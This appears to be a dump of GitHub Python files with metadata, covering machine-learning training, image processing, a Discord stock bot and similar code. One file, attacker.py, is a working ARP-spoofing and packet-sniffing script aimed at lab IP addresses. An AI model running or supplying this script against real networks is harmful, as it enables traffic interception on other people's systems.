seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
31838419123 | import numpy as np
try:
import cPickle as pickle
except:
import pickle
from dataset.mnist import load_mnist
from SGD.TwoLayerNet import TwoLayerNet
(x_train, t_train), (x_test, t_test) = load_mnist\
(normalize=False,flatten=True,one_hot_label=True)
train_loss = []
'''超参数'''
iters_num = 1000
train_size = x_train.shape[0]
batch_size = 100
learning_rate = 0.1
network = TwoLayerNet(input_size = 784, hide_size = 50, output_size = 10)
for i in range(iters_num):
# 获取mini-batch
batch_mask = np.random.choice(train_size, batch_size)
x_batch = x_train[batch_mask]
t_batch = t_train[batch_mask]
# 计算梯度
grad = network.numerical_gradient(x_batch, t_batch)
# grad = network.gradient(x_batch, t_batch) # 高速版!
# 更新参数
for key in ('w1', 'b1', 'w2', 'b2'):
network.params[key] -= learning_rate * grad[key]
# 记录学习过程
loss = network.loss(x_batch, t_batch)
train_loss.append(loss)
print(train_loss)
output = open('network_params.pkl','wb')
pickle.dump(network.params,output)
output.close()
| maplect/CNN-APP | SGD/Neuralnet_train.py | Neuralnet_train.py | py | 1,093 | python | en | code | 2 | github-code | 6 | [
{
"api_name": "dataset.mnist.load_mnist",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "SGD.TwoLayerNet.TwoLayerNet",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "numpy.random.choice",
"line_number": 21,
"usage_type": "call"
},
{
"api_name"... |
35227507194 | # -*- coding: utf-8 -*-
"""
Created on Sat Feb 18 01:16:56 2017
@author: Leon
"""
from osgeo import gdal
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from scipy import spatial
import cv2
im = cv2.imread('fill.jpg')
ntu = cv2.imread('DSCF2098_1471837627895.jpg')
imgray = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)
ret,thresh = cv2.threshold(imgray,127,255,0)
__,contours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
print("there are " + str(len(contours)) + " contours")
#size
[h,w,_] = im.shape
im_final = np.zeros((h,w))
cnt = contours[0]
print("there are " + str(len(cnt)) + " points in contours[0]")
approx = cv2.approxPolyDP(cnt,30,True)
print("after approx, there are " + str(len(approx)) + " points")
print(approx)
cv2.drawContours(im,[approx],0,(255,0,0),-1)
contours.sort(key=len,reverse = True)
cnt = contours[0]
print("there are " + str(len(cnt)) + " points in contours[1]")
approx = cv2.approxPolyDP(cnt,50,True)
print("after approx, there are " + str(len(approx)) + " points")
print(approx)
cv2.drawContours(im,[approx],0,(0,255,0),-1)
cv2.drawContours(ntu,[approx],-1,(255,0,0),3)
cv2.drawContours(im_final,[approx],-1,(255,255,255),-1)
cv2.imwrite('contour.jpg',im)
cv2.imwrite('contour_ntu.jpg',ntu)
cv2.imwrite('final_building.jpg',im_final)
| LeonChen66/UAV-and-TrueOrtho | Building Roof Contour/RDP.py | RDP.py | py | 1,318 | python | en | code | 8 | github-code | 6 | [
{
"api_name": "cv2.imread",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "cv2.imread",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2GRAY",
"line_num... |
31449582311 | import sys
import time
from multiprocessing import Process
from scapy.all import *
def arp_spoof(victim_ip, bystander_ip, attacker_mac):
try:
while True:
send(ARP(op=2, pdst=victim_ip, psrc=bystander_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=attacker_mac), verbose=0)
send(ARP(op=2, pdst=bystander_ip, psrc=victim_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=attacker_mac), verbose=0)
time.sleep(1)
except KeyboardInterrupt:
sys.exit(0)
def packet_sniffer():
def sniff_callback(packet):
if packet.haslayer(IP):
print(f"Sniffed packet: {packet[IP].src} -> {packet[IP].dst}")
sniff(prn=sniff_callback, filter="ip", store=0)
def main():
victim_ip = "192.168.56.20"
bystander_ip = "192.168.56.30"
# Get the attacker's MAC address
attacker_mac = get_if_hwaddr(conf.iface)
# Start the ARP spoofing process
arp_spoof_process = Process(target=arp_spoof, args=(victim_ip, bystander_ip, attacker_mac))
arp_spoof_process.start()
# Start the packet sniffing process
packet_sniffer_process = Process(target=packet_sniffer)
packet_sniffer_process.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
arp_spoof_process.terminate()
packet_sniffer_process.terminate()
if __name__ == "__main__":
main()
| emrberk/network-attacks | attacker/attacker.py | attacker.py | py | 1,369 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "time.sleep",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Process",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Process",... |
12229413948 | import torch
import torchvision
import PIL
import torch.nn.functional as F
import numpy
from matplotlib import cm
#CAM
def hook_store_A(module, input, output):
module.A = output[0]
def hook_store_dydA(module, grad_input, grad_output):
module.dydA = grad_output[0]
if __name__ == "__main__":
model = torchvision.models.vgg19(pretrained=True)
to_tensor = torchvision.transforms.ToTensor()
img = PIL.Image.open('elephant_hippo.jpeg')
input = to_tensor(img).unsqueeze(0)
layer = model.features[35]
layer.register_forward_hook(hook_store_A)
layer.register_backward_hook(hook_store_dydA)
output = model(input)
c = 386 # African elephant
output[0, c].backward()
alpha = layer.dydA.mean((2, 3), keepdim=True)
L = torch.relu((alpha * layer.A).sum(1, keepdim=True))
L = L / L.max()
L = F.interpolate(L, size=(input.size(2), input.size(3)),
mode='bilinear', align_corners=False)
l = L.view(L.size(2), L.size(3)).detach().numpy()
PIL.Image.fromarray(numpy.uint8(cm.gist_earth(l) * 255)).save('result.png')
res = PIL.Image.open('result.png')
img=img.convert('RGBA')
merge_res = PIL.Image.blend(img, res, 0.8)
merge_res.save('result-merge.png') | pengxj/DeepLearningCourse | code/VisInput.py | VisInput.py | py | 1,281 | python | en | code | 9 | github-code | 6 | [
{
"api_name": "torchvision.models.vgg19",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "torchvision.models",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "torchvision.transforms.ToTensor",
"line_number": 16,
"usage_type": "call"
},
{
"... |
43001373047 | __author__ = "Vikram Anand"
__email__ = "vikram.anand@carenostics.com"
__license__ = "Apache 2.0"
__maintainer__ = "developer"
__status__ = "Production"
__version__ = "0.0.1"
import os
import logging
from google.cloud import bigquery, storage
logger = logging.getLogger('BigQuery')
class BigQuery:
"""Class Bigquery to connect and execute a query."""
def __init__(self, source_project = 'hmh-carenostics-dev', source_dataset = 'ckd_table'):
"""Class Bigquery to connect and execute a query."""
self.source_project = source_project
self.source_dataset = source_dataset
self.__initialize()
def __initialize(self):
self.client = bigquery.Client(project=self.source_project)
def query(self, query):
query_df = self.client.query(query).result().to_dataframe()
return query_df
| RiptideStar/DataStack-main | hmhn/scripts/old-postgress/python-scripts/metrics/carenostics/big_query.py | big_query.py | py | 814 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "logging.getLogger",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "google.cloud.bigquery.Client",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "google.cloud.bigquery",
"line_number": 24,
"usage_type": "name"
}
] |
23935769471 | import numpy as np
import scipy.sparse as sp
import tensorflow as tf
import gc
import random
from clac_metric import cv_model_evaluate
from utils import *
from model import GCNModel
from opt import Optimizer
def PredictScore(train_drug_dis_matrix, drug_matrix, dis_matrix, seed, epochs, emb_dim, dp, lr, adjdp):
np.random.seed(seed)
tf.reset_default_graph()
tf.set_random_seed(seed)
adj = constructHNet(train_drug_dis_matrix, drug_matrix, dis_matrix)
adj = sp.csr_matrix(adj)
association_nam = train_drug_dis_matrix.sum()
X = constructNet(train_drug_dis_matrix)
features = sparse_to_tuple(sp.csr_matrix(X))
num_features = features[2][1]
features_nonzero = features[1].shape[0]
adj_orig = train_drug_dis_matrix.copy()
adj_orig = sparse_to_tuple(sp.csr_matrix(adj_orig))
adj_norm = preprocess_graph(adj)
adj_nonzero = adj_norm[1].shape[0]
placeholders = {
'features': tf.sparse_placeholder(tf.float32),
'adj': tf.sparse_placeholder(tf.float32),
'adj_orig': tf.sparse_placeholder(tf.float32),
'dropout': tf.placeholder_with_default(0., shape=()),
'adjdp': tf.placeholder_with_default(0., shape=())
}
model = GCNModel(placeholders, num_features, emb_dim,
features_nonzero, adj_nonzero, train_drug_dis_matrix.shape[0], name='LAGCN')
with tf.name_scope('optimizer'):
opt = Optimizer(
preds=model.reconstructions,
labels=tf.reshape(tf.sparse_tensor_to_dense(
placeholders['adj_orig'], validate_indices=False), [-1]),
model=model,
lr=lr, num_u=train_drug_dis_matrix.shape[0], num_v=train_drug_dis_matrix.shape[1], association_nam=association_nam)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
for epoch in range(epochs):
feed_dict = dict()
feed_dict.update({placeholders['features']: features})
feed_dict.update({placeholders['adj']: adj_norm})
feed_dict.update({placeholders['adj_orig']: adj_orig})
feed_dict.update({placeholders['dropout']: dp})
feed_dict.update({placeholders['adjdp']: adjdp})
_, avg_cost = sess.run([opt.opt_op, opt.cost], feed_dict=feed_dict)
if epoch % 100 == 0:
feed_dict.update({placeholders['dropout']: 0})
feed_dict.update({placeholders['adjdp']: 0})
res = sess.run(model.reconstructions, feed_dict=feed_dict)
print("Epoch:", '%04d' % (epoch + 1),
"train_loss=", "{:.5f}".format(avg_cost))
print('Optimization Finished!')
feed_dict.update({placeholders['dropout']: 0})
feed_dict.update({placeholders['adjdp']: 0})
res = sess.run(model.reconstructions, feed_dict=feed_dict)
sess.close()
return res
def cross_validation_experiment(drug_dis_matrix, drug_matrix, dis_matrix, seed, epochs, emb_dim, dp, lr, adjdp):
index_matrix = np.mat(np.where(drug_dis_matrix == 1))
association_nam = index_matrix.shape[1]
random_index = index_matrix.T.tolist()
random.seed(seed)
random.shuffle(random_index)
k_folds = 5
CV_size = int(association_nam / k_folds)
temp = np.array(random_index[:association_nam - association_nam %
k_folds]).reshape(k_folds, CV_size, -1).tolist()
temp[k_folds - 1] = temp[k_folds - 1] + \
random_index[association_nam - association_nam % k_folds:]
random_index = temp
metric = np.zeros((1, 7))
print("seed=%d, evaluating drug-disease...." % (seed))
for k in range(k_folds):
print("------this is %dth cross validation------" % (k+1))
train_matrix = np.matrix(drug_dis_matrix, copy=True)
train_matrix[tuple(np.array(random_index[k]).T)] = 0
drug_len = drug_dis_matrix.shape[0]
dis_len = drug_dis_matrix.shape[1]
drug_disease_res = PredictScore(
train_matrix, drug_matrix, dis_matrix, seed, epochs, emb_dim, dp, lr, adjdp)
predict_y_proba = drug_disease_res.reshape(drug_len, dis_len)
metric_tmp = cv_model_evaluate(
drug_dis_matrix, predict_y_proba, train_matrix)
print(metric_tmp)
metric += metric_tmp
del train_matrix
gc.collect()
print(metric / k_folds)
metric = np.array(metric / k_folds)
return metric
if __name__ == "__main__":
drug_sim = np.loadtxt('../data/drug_sim.csv', delimiter=',')
dis_sim = np.loadtxt('../data/dis_sim.csv', delimiter=',')
drug_dis_matrix = np.loadtxt('../data/drug_dis.csv', delimiter=',')
epoch = 4000
emb_dim = 64
lr = 0.01
adjdp = 0.6
dp = 0.4
simw = 6
result = np.zeros((1, 7), float)
average_result = np.zeros((1, 7), float)
circle_time = 1
for i in range(circle_time):
result += cross_validation_experiment(
drug_dis_matrix, drug_sim*simw, dis_sim*simw, i, epoch, emb_dim, dp, lr, adjdp)
average_result = result / circle_time
print(average_result)
| storyandwine/LAGCN | code/main.py | main.py | py | 5,019 | python | en | code | 45 | github-code | 6 | [
{
"api_name": "numpy.random.seed",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.reset_default_graph",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "te... |
17221793090 | import json
import aiohttp
import discord
import datetime
from discord import Embed
import plotly.express as px
import pandas as pd
import random
with open("config.json", "r") as config:
data = json.load(config)
token = data["Token"]
prefix = data["Prefix"]
intents = discord.Intents.default()
intents.members = True
client = discord.Client(intents=intents)
@client.event
async def on_ready():
print("ready")
@client.event
async def on_message(ticker):
if prefix in ticker.content:
try:
urlchart = "https://query1.finance.yahoo.com/v8/finance/chart/{}?symbol={}&period1=1653192000&period2={}&useYfid=true&interval=1d&includePrePost=true&events=div|split|earn&lang=en-CA®ion=CA&crumb=y.I3QERsNxs&corsDomain=ca.finance.yahoo.com".format(ticker.content.replace("$","").upper(),ticker.content.replace("$","").upper(),str(int((datetime.datetime.now() - datetime.datetime.utcfromtimestamp(0)).total_seconds())))
urlticker = "https://query2.finance.yahoo.com/v7/finance/quote?formatted=true&crumb=wkU/diDLxbC&lang=en-US®ion=US&symbols={}&fields=messageBoardId,longName,shortName,marketCap,underlyingSymbol,underlyingExchangeSymbol,headSymbolAsString,regularMarketPrice,regularMarketChange,regularMarketChangePercent,regularMarketVolume,uuid,regularMarketOpen,fiftyTwoWeekLow,fiftyTwoWeekHigh,toCurrency,fromCurrency,toExchange,fromExchange,corporateActions&corsDomain=finance.yahoo.com".format(ticker.content.replace("$","").upper())
headers = {"accept": "*/*","accept-language": "en-US,en;q=0.7","sec-fetch-dest": "empty","sec-fetch-mode": "cors","sec-fetch-site": "same-site","sec-gpc": "1","referrer": "https://ca.finance.yahoo.com/","referrerPolicy": "no-referrer-when-downgrade","body": "null","method": "GET","mode": "cors","credentials": "include"}
getCdata = await chartData(urlchart,headers)
getTdata = await tickerData(urlticker,headers)
plotted = await plot(getCdata,getTdata['tick'])
embeds = await embed(getTdata, plotted)
await sendOut(embeds,ticker,plotted)
except Exception as e:
print("failed {}".format(e))
async def chartData(url,headers):
async with aiohttp.ClientSession() as chartdata:
async with chartdata.get(url,headers=headers) as get:
d = {}
chartdata_json = json.loads(await get.text())
chartdata_json = chartdata_json['chart']['result'][0]
timestamps = chartdata_json["timestamp"]
dates = []
for each in timestamps:
dates.append(datetime.datetime.fromtimestamp(each).strftime('%Y-%m-%d %H:%M:%S'))
openData = chartdata_json["indicators"]["quote"][0]['open']
closeData = chartdata_json["indicators"]["quote"][0]['close']
highData = chartdata_json["indicators"]["quote"][0]['high']
lowData = chartdata_json["indicators"]["quote"][0]['low']
volumeData = chartdata_json["indicators"]["quote"][0]['volume']
d["Dates"] = dates
d["Open"] = openData
d["Close"] = closeData
d["High"] = highData
d["Low"] = lowData
d["Volume"] = volumeData
return d
async def tickerData(url,headers):
async with aiohttp.ClientSession() as tickerdata:
async with tickerdata.get(url,headers=headers) as get:
ticker_json = json.loads(await get.text())
ticker_json = ticker_json['quoteResponse']['result'][0]
d = {}
d['tick'] = ticker_json['symbol']
d['currentPrice'] = ticker_json["regularMarketPrice"]['fmt']
d['marketCap'] = ticker_json['marketCap']['fmt']
d['marketTime'] = ticker_json['regularMarketTime']['fmt']
d['percentChangedDay'] = ticker_json['regularMarketChangePercent']['fmt']
d['marketRange'] = ticker_json['regularMarketDayRange']['fmt']
d['yearlyLowChange'] = ticker_json['fiftyTwoWeekLowChange']['fmt']
d['percentYearlyLow'] = ticker_json['fiftyTwoWeekHighChangePercent']['fmt']
d['regMarketHigh'] = ticker_json['regularMarketDayHigh']['fmt']
d['sharesOut'] = ticker_json['sharesOutstanding']['fmt']
d['regPrevClose'] = ticker_json['regularMarketPreviousClose']['fmt']
d['yearlyHigh'] = ticker_json['fiftyTwoWeekHigh']['fmt']
d['yearlyhighChange'] = ticker_json['fiftyTwoWeekHighChange']['fmt']
d['yearlyRange'] = ticker_json['fiftyTwoWeekRange']['fmt']
d['regMarketChange'] = ticker_json['regularMarketChange']['fmt']
d['yearlyLow'] = ticker_json['fiftyTwoWeekLow']['fmt']
d['marketVol'] = ticker_json['regularMarketVolume']['fmt']
d['regMarketLow'] = ticker_json['regularMarketDayLow']['fmt']
d['shortName'] = ticker_json['shortName']
return d
async def plot(datas,tick):
df = pd.DataFrame(datas)
fig = px.line(df, title="{} Chart".format(tick), x = "Dates", y =["Open","Close","High","Low"])
fig.update_layout(paper_bgcolor="black",plot_bgcolor="black")
openImgDir = "{}.jpg".format(tick+str(random.randint(0,1000000)))
fig.write_image(openImgDir)
df1 = pd.DataFrame(datas)
fig1 = px.line(df1, title="{} Volume Chart".format(tick), x = "Dates", y ="Volume")
fig1.update_layout(paper_bgcolor="black",plot_bgcolor="black")
volImgDir = "{}.jpg".format(tick+str(random.randint(0,1000000)))
fig1.write_image(volImgDir)
return openImgDir, volImgDir
async def embed(Tdata,plotted):
embeds = []
embed = discord.Embed()
embed1 = discord.Embed()
embed2 = discord.Embed()
embed.title = "${} Stock Info".format(Tdata['tick'])
embed.description = "Market statistics and data for {}".format(Tdata['shortName'])
embed.add_field(name="Ticker", value=Tdata['tick'], inline=True)
embed.add_field(name="Current Market Time", value=Tdata['marketTime'], inline=True)
embed.add_field(name="Current Price", value=Tdata['currentPrice'], inline=True)
embed.add_field(name="Market Cap", value=Tdata['marketCap'], inline=True)
embed.add_field(name="24Hr High", value=Tdata['regMarketHigh'], inline=True)
embed.add_field(name="24hr Low", value=Tdata['regMarketLow'], inline=True)
embed.add_field(name="24Hr Difference", value=Tdata['regMarketChange'], inline=True)
embed.add_field(name="24Hr %", value=Tdata['percentChangedDay'], inline=True)
embed.add_field(name="24Hr Range", value=Tdata['marketRange'], inline=True)
embed.add_field(name="Market Volume", value=Tdata['marketVol'], inline=True)
embed.add_field(name="Outstanding Shares", value=Tdata['sharesOut'], inline=True)
embed.add_field(name="Previous Close", value=Tdata['regPrevClose'], inline=True)
embed.add_field(name="52w Price Difference", value=Tdata['yearlyLowChange'], inline=True)
embed.add_field(name="52w %", value=Tdata['percentYearlyLow'], inline=True)
embed.add_field(name="52w High", value=Tdata['yearlyHigh'], inline=True)
embed.add_field(name="52w High Difference", value=Tdata['yearlyhighChange'], inline=True)
embed.add_field(name="52w Range", value=Tdata['yearlyRange'], inline=True)
embed.add_field(name="52w Low", value=Tdata['yearlyLow'], inline=True)
embed1.set_image(url="attachment://{}".format(plotted[0]))
embed2.set_image(url="attachment://{}".format(plotted[1]))
embeds.append(embed)
embeds.append(embed1)
embeds.append(embed2)
return embeds
async def sendOut(embeds,ticker,plotted):
await ticker.channel.send(embed=embeds[0])
with open(plotted[0], 'rb') as image1:
await ticker.channel.send(file=discord.File(image1, filename=plotted[0]))
with open(plotted[1], 'rb') as image2:
await ticker.channel.send(file=discord.File(image2, filename=plotted[1]))
client.run(token)
| Eryck13/StockBot | main.py | main.py | py | 8,237 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "json.load",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "discord.Intents.default",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "discord.Intents",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "discord.Client... |
27356830765 | import random
import os
from helpers import *
from keras.models import model_from_json
# load json and create model
json_file = open('saved_models/model.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
model = model_from_json(loaded_model_json)
# load weights into new model
model.load_weights("saved_models/CNN_model.h5")
path = '../DR_data/vins'
#file = random.choice(os.listdir(path))
file = '1AYEN45963S374568_Agane_light.ttf245.png'
# file = '6TNEF59347P425193_verdana.ttf225.png'
# Read the input image
im = cv2.imread(path + '/' + file)
cv2.imshow("Original Image with Rectangular ROIs {}".format(file), im)
cv2.waitKey()
'''
VIN CONTAINS 17 numbers
letters are capital
1 number
4 letters
5 numbers
1 letter
6 numbers
Perhaps can tran two models for numbers and letters but for now won't do that
number_positions = [0, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16]
letters_positions = [1, 2, 3, 4, 10]
'''
vin = []
ROIs = detect_characters(im, path + '/' + file)
for roi in ROIs:
roi = np.expand_dims(roi, axis=0) # need this if I want to predict on a single image
prediction = model.predict(roi)
vin.append(prediction)
classes = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'J', 'K', 'L', 'M', 'N',
'P', 'R', 'S', 'T', 'V', 'W', 'X', 'Y']
vins = np.array(vin)
''.join([str(e) for e in vins])
print(vins)
vin_string = ''
for vin in vins:
for pred_list in vin:
for index, pred in enumerate(pred_list):
if int(pred) == 1:
predicted_value = classes[index]
vin_string += predicted_value
break
print(vin_string)
print(file[:17])
cv2.imshow("Resulting Image with Rectangular ROIs", im)
cv2.waitKey()
| pekkipo/Characters_recognition | predict_characters.py | predict_characters.py | py | 1,793 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "keras.models.model_from_json",
"line_number": 11,
"usage_type": "call"
}
] |
16119657095 | __author__ = 'burgosz'
from django import template
register = template.Library()
from zabbix_reports.templatetags.zabbix_call import zbx_call
from django.core.cache import cache
@register.assignment_tag
def zbx_service_container_get():
services = []
return services
# Iterate over services and get the service ids in order with there level of deepness.
def _zbx_service_ids_get_deep(topids, service_ids, level=0):
topidstostring = '["'+'","'.join(str(e) for e in topids)+'"]'
args = "{'parentids': "+topidstostring+", 'output': 'extend'}"
services = zbx_call('service.get', args)
services = sorted(services['result'], key=lambda srv: srv['name'])
for service in services:
service_ids.append({'id': str(service['serviceid']), 'level': str(level)})
pids = []
pids.append(int(service['serviceid']))
level += 1
_zbx_service_ids_get_deep(pids, service_ids, level)
level -= 1
return_value = '["'+'","'.join(str(e['id']) for e in service_ids)+'"]'
return return_value
@register.assignment_tag
def zbx_service_ids_get_deep(topids, service_ids, level=0):
# Cache the service ids
key = "deep_"+'["'+'","'.join(str(e) for e in topids)+'"]'
cached = cache.get(key)
if cached:
for cached_srv in cached:
service_ids.append(cached_srv)
return '["'+'","'.join(str(e['id']) for e in service_ids)+'"]'
else:
return_value = _zbx_service_ids_get_deep(topids, service_ids, level)
cache.set(key, service_ids, None)
return return_value
| burgosz/zabbix_reports | templatetags/zabbix_services.py | zabbix_services.py | py | 1,574 | python | en | code | 5 | github-code | 6 | [
{
"api_name": "django.template.Library",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "django.template",
"line_number": 3,
"usage_type": "name"
},
{
"api_name": "zabbix_reports.templatetags.zabbix_call.zbx_call",
"line_number": 17,
"usage_type": "call"
},
{... |
35473650215 | from tensorflow.keras.models import load_model
from delta import calculate_gt
from loss import detection_loss, ssd_loss
import numpy as np
import pickle
from nms import non_maximum_suppression
from utils import images_with_rectangles, plot_images, xywh2xyxy, draw_rectangles
# load models
model = load_model('../models/best_model.h5', custom_objects={'ssd_loss': ssd_loss})
# load dataset
train_xs = np.load('../datasets/debug_true_images.npy')
train_ys = np.load('../datasets/debug_true_labels.npy')
trues_delta = xywh2xyxy(train_ys[..., :4])
trues_cls = train_ys[..., -1]
# load default_boxes
f = open('../datasets/default_boxes_bucket.pkl', 'rb')
default_boxes_bucket = pickle.load(f)
default_boxes = np.concatenate(default_boxes_bucket, axis=0)
# predictions with batch images
preds = model.predict(x=train_xs)
preds_onehot = preds[..., 4:] # shape=(N_img, N_anchor, n_classes)
preds_delta = preds[..., :4] # shape=(N_img, N_anchor, 4)
# change relative coords to absolute coords for predictions
gts_hat = calculate_gt(default_boxes, preds_delta) # shape=(N_img, N_anchor, 4)
# change relative coords to absolute coords for groundruths
gts = calculate_gt(default_boxes, trues_delta) # shape=(N_img, N_anchor, 4)
# get foreground(not background) bool mask for prediction, shape (N_img, N_default_boxes)
preds_cls = np.argmax(preds_onehot, axis=-1) # shape (N_img, N_default_boxes)
pos_preds_mask = (preds_cls != 10) # shape (N_img, N_default_boxes)
# get foreground bool mask for true, shape (N_img, N_default_boxes)
pos_trues_mask = (trues_cls != 10) # shape (N_img, N_default_boxes)
# 이미지 한장당 positive localization, classification 정보를 가져옵니다.
pos_preds_loc = []
pos_preds_cls = []
pos_preds_onehot = []
for pos_pred_mask, gt_hat, pred_cls, pred_onehot in zip(pos_preds_mask, gts_hat, preds_cls, preds_onehot):
pos_loc = gt_hat[pos_pred_mask]
pos_cls = pred_cls[pos_pred_mask]
pos_mask = pred_onehot[pos_pred_mask]
pos_preds_loc.append(pos_loc)
pos_preds_cls.append(pos_cls)
pos_preds_onehot.append(pos_mask)
# Non Maximum Suppression per image
nms_bboxes = []
for onehot_, loc_, cls_ in zip(pos_preds_onehot, pos_preds_loc, pos_preds_cls):
final_bboxes, _, _ = non_maximum_suppression(loc_, onehot_, 0.5)
final_bboxes = xywh2xyxy(np.array(final_bboxes))
nms_bboxes.append(final_bboxes)
# 이미지 한장당 positive localization, classification 정보를 가져옵니다.
pos_trues_loc = []
pos_trues_cls = []
for pos_pred_mask, gt, true_cls in zip(pos_trues_mask, gts, trues_cls):
pos_loc = gt[pos_pred_mask]
pos_cls = true_cls[pos_pred_mask]
pos_loc = xywh2xyxy(pos_loc)
pos_trues_loc.append(pos_loc)
pos_trues_cls.append(pos_cls)
# visualization prediction
rected_images = images_with_rectangles(train_xs * 255, pos_trues_loc, color=(0, 255, 0))
plot_images(rected_images)
rected_images = images_with_rectangles(train_xs * 255, nms_bboxes, color=(255, 255, 0))
plot_images(rected_images)
| taila0/single-shot-multibox-detector | src/main_eval.py | main_eval.py | py | 3,001 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "tensorflow.keras.models.load_model",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "loss.ssd_loss",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "numpy.load",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.loa... |
73871407226 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 27 20:09:14 2020
@author: scro3517
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
c1 = 1 #b/c single time-series
c2 = 4 #4
c3 = 16 #4
c4 = 32 #4
k=7 #kernel size
s=3 #stride
#num_classes = 3
class cnn_network_time(nn.Module):
""" CNN Implemented in Original Paper - Supposedly Simple but Powerful """
def __init__(self,dropout_type,p1,p2,p3,classification,heads='single'):
super(cnn_network_time,self).__init__()
if classification is not None and classification != '2-way':
num_classes = int(classification.split('-')[0])
elif classification == '2-way':
num_classes = 1
embedding_dim = 100 #100
#self.conv1 = nn.Conv2d(c1,c2,k,s)
self.conv1 = nn.Conv1d(c1,c2,k,s)
self.batchnorm1 = nn.BatchNorm1d(c2)
#self.conv2 = nn.Conv2d(c2,c3,k,s)
self.conv2 = nn.Conv1d(c2,c3,k,s)
self.batchnorm2 = nn.BatchNorm1d(c3)
#self.conv3 = nn.Conv2d(c3,c4,k,s)
self.conv3 = nn.Conv1d(c3,c4,k,s)
self.batchnorm3 = nn.BatchNorm1d(c4)
self.linear1 = nn.Linear(c4*10,embedding_dim)
self.linear2 = nn.Linear(embedding_dim,num_classes)
self.oracle_head = nn.Linear(embedding_dim,1) #I may have to comment out when performing inference for ALPS
self.heads = heads
self.relu = nn.ReLU()
self.selu = nn.SELU()
self.maxpool = nn.MaxPool1d(2)
#self.fracmaxpool = nn.FractionalMaxPool2d(2,output_ratio=0.50) #kernel size, output size relative to input size
if dropout_type == 'drop1d':
self.dropout1 = nn.Dropout(p=p1) #0.2 drops pixels following a Bernoulli
self.dropout2 = nn.Dropout(p=p2) #0.2
self.dropout3 = nn.Dropout(p=p3)
elif dropout_type == 'drop2d':
self.dropout1 = nn.Dropout2d(p=p1) #drops channels following a Bernoulli
self.dropout2 = nn.Dropout2d(p=p2)
self.dropout3 = nn.Dropout2d(p=p3)
#self.alphadrop1 = nn.AlphaDropout(p=0.1) #used primarily with selu activation
def forward(self,x):
x = self.dropout1(self.maxpool(self.relu(self.batchnorm1(self.conv1(x)))))
x = self.dropout2(self.maxpool(self.relu(self.batchnorm2(self.conv2(x)))))
x = self.dropout3(self.maxpool(self.relu(self.batchnorm3(self.conv3(x)))))
x = torch.reshape(x,(x.shape[0],x.shape[1]*x.shape[2]))
x = self.relu(self.linear1(x))
out = self.linear2(x)
if self.heads == 'multi':
p = self.oracle_head(x)
return (out,p)
else:
return out
#%%
class cnn_network_image(nn.Module):
def __init__(self,dropout_type,p1,p2,p3,classification,heads='single'):
super(cnn_network_image, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
self.dropout1 = nn.Dropout(p=p1) #0.2 drops pixels following a Bernoulli
self.dropout2 = nn.Dropout(p=p2) #0.2
#self.dropout3 = nn.Dropout(p=p3)
self.oracle_head = nn.Linear(84,1) #I may have to comment out when performing inference for ALPS
self.heads = heads
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 16 * 5 * 5)
x = self.dropout1(F.relu(self.fc1(x)))
x = self.dropout2(F.relu(self.fc2(x)))
out = self.fc3(x)
if self.heads == 'multi':
p = self.oracle_head(x)
return (out,p)
else:
return out | danikiyasseh/SoQal | prepare_network.py | prepare_network.py | py | 3,891 | python | en | code | 4 | github-code | 6 | [
{
"api_name": "torch.nn.Module",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "torch.nn.Conv1d",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_nu... |
40786176947 | import pandas as file
import matplotlib.pyplot as plt
import numpy as np
from sklearn.cluster import KMeans
from sklearn import cluster, datasets, metrics
